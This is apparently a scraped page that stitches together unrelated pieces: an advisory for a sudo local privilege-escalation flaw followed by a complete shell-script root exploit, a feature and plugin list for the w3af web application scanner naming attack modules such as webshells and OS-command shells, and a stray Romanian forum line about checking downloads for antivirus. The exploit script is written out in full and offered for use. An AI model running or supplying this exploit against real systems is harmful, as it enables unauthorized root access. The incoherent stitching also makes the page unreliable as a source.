Leaderboard

Severity: HIGH To see if your sudo is vulnerable type sudo -V The utility is prone to a local privilege-escalation vulnerability because it fails to correctly validate certain nondefault rules in the 'sudoer' configuration file. This issue occurs in the 'sudo/parse.c' source file. Users in supplementary groups may gain 'root' user privileges. Local attackers could exploit this issue to run arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer. Affected Products Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 Ubuntu 9.10 And also other Linux distribution that use Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 ---snip--- #!/bin/sh # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 # local root exploit # March 2010 # automated by kingcope # Full Credits to Slouching echo Tod Miller Sudo local root exploit echo by Slouching echo automated by kingcope if [ $# != 1 ] then echo "usage: ./sudoxpl.sh <file you have permission to edit>" exit fi cd /tmp cat > sudoedit << _EOF #!/bin/sh echo ALEX-ALEX su /bin/su /usr/bin/su _EOF chmod a+x ./sudoedit sudo ./sudoedit $1 --snip--- cheers, kingcope

Framework features w3af provides plugin writers with this features: urllib2 wrapper In order to send requests to te remote server w3af uses urllib2. The xUrllib module of w3af is a wrapper of urllib2 to make the plugin writer life easier, using this wrapper a plugin writer can forget about proxy's, proxy auth, basic/digest auth, etc. This is the complete list of features provided by xUrllib: - Proxy - Proxy auth ( basic and digest ) - Site auth ( basic and digest ) - Gracefully handle timeouts - UserAgent faking - Add custom headers to requests - Cookie handling - Local cache for GET and HEAD requests - Local dns cache, this will speed up scannings. Only one request is made to the DNS server - Keep-alive support fot http and https connections - File upload using multipart POST requests - SSL certificate support Output Management w3af provides plugin writers with an abstraction layer for data output using the Output Manager. The output manager can also be extended using plugins and can be used for writing results to a txt/html file or sending them over the network using scp, the options are endless. Available ouput plugins are: - Console - Text file Web Service support w3af knows how to parse WSDL files, and audit webservices. Plugin developers can write a simple plugin that will be able to find bugs in web services and also in common HTTP applications. HTTP headers fuzzing w3af supports finding bugs in HTTP headers with great ease! IPC IPC ( inter plugin communication ) can easily be done using the knowledge base, another w3af feature thats really usefull for plugin developers. Session saving Framework parameters can be saved to a file using the sessionManager. After that, you can load the settings and start the same scan again without configuring all parameters. Fuzzer Right now w3af has a really simple fuzzer, but we have plans to extend it. Fuzzers are great, we know it. HTML / WML parsing w3af provides HTML / WML parsing features that are really easy to use. This is the list of plugins that are available in w3af, if you have any comments or feature requests, don't hesitate to send them to the w3af mailing list. Plugins audit xsrf htaccessMethods sqli sslCertificate fileUpload mxInjection generic localFileInclude unSSL xpath osCommanding remoteFileInclude dav ssi eval buffOverflow xss xst blindSqli formatString preg_replace globalRedirect LDAPi phishingVector frontpage responseSplitting bruteforce formAuthBrute basicAuthBrute grep dotNetEventValidation pathDisclosure codeDisclosure blankBody metaTags motw privateIP directoryIndexing svnUsers ssn fileUpload strangeHTTPCode hashFind getMails httpAuthDetect wsdlGreper newline passwordProfiling domXss ajax findComments httpInBody strangeHeaders lang errorPages collectCookies strangeParameters error500 objects creditCards oracle feeds evasion shiftOutShiftInBetweenDots backSpaceBetweenDots rndPath selfReference modsecurity rndCase rndHexEncode reversedSlashes fullWidthEncode rndParam attack sqlmap osCommandingShell xssBeef localFileReader rfiProxy remoteFileIncludeShell davShell eval fileUploadShell sql_webshell output htmlFile xmlFile textFile console gtkOutput mangle sed discovery webDiff sitemapReader detectReverseProxy phpEggs spiderMan urlFuzzer userDir findvhost fingerprint_os findBackdoor wordnet zone_h performance_testing robotsReader sharedHosting afd allowedMethods phpinfo importResults findCaptchas serverStatus oracleDiscovery yahooSiteExplorer frontpage_version detectTransparentProxy dnsWildcard webSpider fingerMSN googleSets digitSum halberd domain_dot MSNSpider fingerprint_WAF serverHeader wsdlFinder pykto crossDomain fingerPKS googleSpider hmap phishtank fingerGoogle dotNetErrors archiveDotOrg ghdb Download basic video tutorial

ai antivirus la zi, app zi-mi printr-un pm ce ai descarcat ca sa verific(sunt admin pe rowarez)